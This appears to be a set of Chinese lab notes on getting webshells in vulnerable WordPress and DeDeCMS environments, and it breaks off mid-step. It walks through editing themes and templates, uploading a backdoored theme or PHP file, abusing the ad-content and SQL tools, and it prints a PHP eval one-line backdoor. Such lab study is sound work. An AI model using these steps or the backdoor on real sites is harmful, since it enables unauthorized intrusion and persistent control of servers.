Wordperss漏洞
环境搭建
#执⾏命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://8.155.7.173:8080/wp-admin/
注册账号
登录
漏洞一:后台修改模板拿WebShell
步骤一:思路是修改其WP的模板写入⼀句话木马后门并访问其文件即可GetShell;登陆WP后点击 【Appearance】 -->author-bio.php
步骤二:在其模板中插入一句话木马代码..点击 【Update File】 按钮
<?php @eval($_POST[123]);?>
步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/twentyfifteen/author-bio.php
步骤四:尝试蚁剑连接获取webshell
漏洞二:上传主题拿WebShell
步骤⼀:接着上⼀个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP⽂件
先去下载一个免费模板
https://blog.csdn.net/m0_59768231/article/details/144777066?spm=1001.2014.3001.5502
解压后打开第一个文件夹写入一句话木马
重新压缩为一个.zip压缩包
步骤二:找到网站上传模板主题的位置
选中我们刚才重新压缩好的文件
步骤三:访问以下连接即可获取WebShell
http://8.155.7.173:8080/wp-content/themes/moban-1354265872-wordpress329-sprout-in-hands-10/1.php
步骤四:尝试蚁剑连接获取webshell
DeDeCMS漏洞
环境搭建
傻瓜式安装
漏洞一:通过文件管理器上传WebShel
步骤⼀:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过⽂件管理器上传php文件获取webshell
登陆网站后台
步骤二:登陆到后台点击 【核心】 --》 【文件式管理器】 --》 【文件上传】 将准备好的恶意代码上传
步骤三:访问上传成功后的文件
http://127.0.0.1/dedecms/uploads/1.php
漏洞二:修改模板文件拿WebShell
步骤⼀:与WPCMS类似,直接修改模板拿WebShell..点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】
进入后添加恶意代码
步骤二:点击 【胜成】 --》 【更新主页HTML】 --》将主页位置修改为【../index.php 】--》点击 【生成静态】 --》点击 【更新主页】 再次访问站点首页可发现变化
步骤三:访问主页,phpinfo更新成功
漏洞三:后台任意命令执行拿WebShell
步骤一:点击 【模块】 --》 【广告管理】 --》 【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接
http://127.0.0.1/dedecms/plus/ad_js.php?aid=1
步骤三:使用蚁剑测试连接
漏洞四:通过后台sql命令执行拿webshell
步骤一:访问系统---sql命令行工具---执行 select @@basedir,获取mysql路径,由此瑞测网站绝对路径
猜测绝对路径为E:/phpStudy/PHPTutorial/